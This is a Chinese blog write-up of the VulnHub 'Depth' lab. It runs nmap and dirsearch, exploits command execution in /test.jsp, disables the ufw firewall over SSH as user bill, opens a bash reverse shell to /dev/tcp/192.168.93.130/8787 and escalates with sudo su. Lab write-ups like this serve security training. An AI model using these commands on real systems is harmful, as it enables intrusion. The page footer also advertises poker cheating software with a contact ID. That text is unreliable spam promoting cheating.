【vulnhub】Depth靶机
创始人
2024-11-13 03:41:18
0

靶机安装

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

运行环境:VMware运行该虚拟机

信息收集

靶机IP发现

nmap 192.168.93.0/24

端口扫描

nmap -A 192.168.93.154 -p-

只开起了8080端口

进行目录扫描8080端口

dirsearch -u http://192.168.93.154:8080

有一个目录/test.jsp

IP网址访问

翻译过后为

后面拼接/test.jsp

翻译过后

提示我们输入 ls -l /tmp 测试一下

存在系统命令执行漏洞,进行利用,反弹shell尝试失败

漏洞利用

ls -l /home 查看到home目录内容,发现bill用户

输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。

尝试关闭防火墙

#尝试关闭防火墙 ssh bill@localhost sudo ufw disable

再次执行反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.93.130/8787 0>&1

获取shell成功

提权

尝试sudo提权

sudo -l,发现所有用户(ALL)都有sudo权限,

直接 sudo su 命令

查看flag文件

上一篇:鸿蒙(HarmonyOS)项目方舟框架(ArkUI)之RichText组件

下一篇:两分钟了解!wpk透视软件网站(透视)wepoker确实有挂(有挂指点)

相关内容

热门资讯

辅助黑科技(wpk最新黑科技)... 辅助黑科技(wpk最新黑科技)wpk透视辅助效果图(wpK)总是真的是有挂(有挂详细)-哔哩哔哩进入...
黑科技辅助(微扑克辅助工具)先... 黑科技辅助(微扑克辅助工具)先前真的是有挂(透视)透明挂教程(果真有挂)-哔哩哔哩1、这是跨平台的微...
辅助黑科技(wepoke辅助插... 辅助黑科技(wepoke辅助插件)wepoke辅助枝巧(wepoker)先前真的是有挂(有挂实锤)-...
黑科技辅助!wepoke软件透... 黑科技辅助!wepoke软件透明挂(aapoker发牌机制)真是存在有挂(有挂透明挂黑科技)-哔哩哔...
黑科技ai(wpk最新黑科技)... 黑科技ai(wpk最新黑科技)wpk ai会不会被封(WPK)一贯存在有挂(有挂攻略)-哔哩哔哩1)...
黑科技辅助(aa扑克发牌机制)... 您好,aa扑克发牌机制这款游戏可以开挂的,确实是有挂的,需要了解加威信【136704302】很多玩家...
黑科技讲解!红龙扑克机制(we... 黑科技讲解!红龙扑克机制(wepoke黑科技)都是是有挂(有挂ai辅助)-哔哩哔哩进入游戏-大厅左侧...
黑科技好牌(wepokeai代... 黑科技好牌(wepokeai代打)wepokewepoke透视挂怎么测试(wePokE)一直真的是有...
黑科技ai代打(wpk最新黑科... 黑科技ai代打(wpk最新黑科技)wpk线上实战(WPK)总是是有挂(有挂助手)-哔哩哔哩;1、下载...
黑科技辅助(来玩app辅助工具... 黑科技辅助(来玩app辅助工具)从来是真的有挂(软件透明挂)玩家教你(有挂教程)-哔哩哔哩是一款可以...